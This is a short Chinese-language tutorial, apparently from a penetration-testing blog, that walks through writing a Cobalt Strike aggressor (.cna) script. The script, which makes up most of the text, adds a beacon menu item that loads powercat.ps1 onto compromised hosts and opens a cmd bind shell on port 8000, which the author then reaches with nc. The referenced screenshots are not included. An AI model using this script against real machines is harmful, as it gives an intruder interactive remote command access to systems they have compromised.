根据官方和github相关脚本,我们编写如下demo
1、首先创建一个文件夹,cna_test
2、使用之前文章中提到的powershell脚本,这里使用powercat
相关文章直接点击访问:渗透测试中常用powershell(一)
3、创建powercat.cna文件
4、cna内容如下,内容很简单,就不过多介绍
代码语言:javascript复制popup beacon_bottom {
menu "powercat" {
item "powercat -l -p 8000 -e cmd"{
local('$bid');
foreach $bid ($1){
bpowershell_import($bid, script_resource("powercat.ps1"));
bpowershell($bid, "powercat -l -p 8000 -e cmd");
elog("jbind shell OK " . mynick() . " on " . binfo("$bid", "computer"));
}
}
}
}5、加载脚本
6、成功加载如图
7、运行如图
8、本地nc连接过去,执行dir命令如图
